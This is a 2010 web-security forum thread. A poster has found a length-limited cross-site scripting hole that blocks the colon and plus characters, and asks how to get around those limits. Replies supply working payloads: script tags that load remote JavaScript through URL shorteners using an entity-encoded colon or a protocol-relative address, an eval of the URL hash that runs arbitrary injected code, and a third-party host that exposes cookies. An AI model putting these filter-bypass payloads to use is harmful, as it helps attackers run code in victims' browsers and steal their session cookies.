I have found a vunlnerability but I only have 50 chars to use, and the biggest problem is I cant use ":" char nor "+"
The good info is that I can use jQuery 1.2.6 because its previously loaded on that page.

I have 52 chars with:
<script>$.getScript('http://bit.ly/9884kP')</script>
but it have ":"
and 64 chars with:
<script>$.getScript(unescape("http%3A//bit.ly/9884kP"))</script>

I tried replacing http:// with // but it didn't work using FF3. I downloaded FF2 and it didin't work also.

I think I could avoid putting the </script> and writing manually with document.write in the js. The problem is the http:
Also fiding a shorter unescape good be nice but I have searched and can't found anything.
any ideas?

<script src='http&#58;//bit.ly/9884kP'></script>

48 chars

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)

<script src=http&#58//u.nu/94m7a></script>

42 - why use bit.ly if there's u.nu ;)

Regarding unescape: 'http\72//' might help



Edited 2 time(s). Last edit at 05/19/2010 05:38AM by .mario.

Trick with "//" called "same protocol". Therefore, it should not work from "file:". It works in all browsers including FF:

<script src=//u.nu/94m7a>

----------------------
~Veritas~



Edited 1 time(s). Last edit at 05/19/2010 08:58AM by LeverOne.

<script>eval(location.hash.slice(1))</script>

and append

#alert('real payload goes after the hash symbol')

to the URL. why use third-party site when you can have all-in-one :)

[edit:] you can use just

http://0x.lv

for a third party script which will alert your cookies or, if you have a hash, it will execute whatever follows the hash in your URL



Edited 2 time(s). Last edit at 05/21/2010 06:01PM by thornmaker.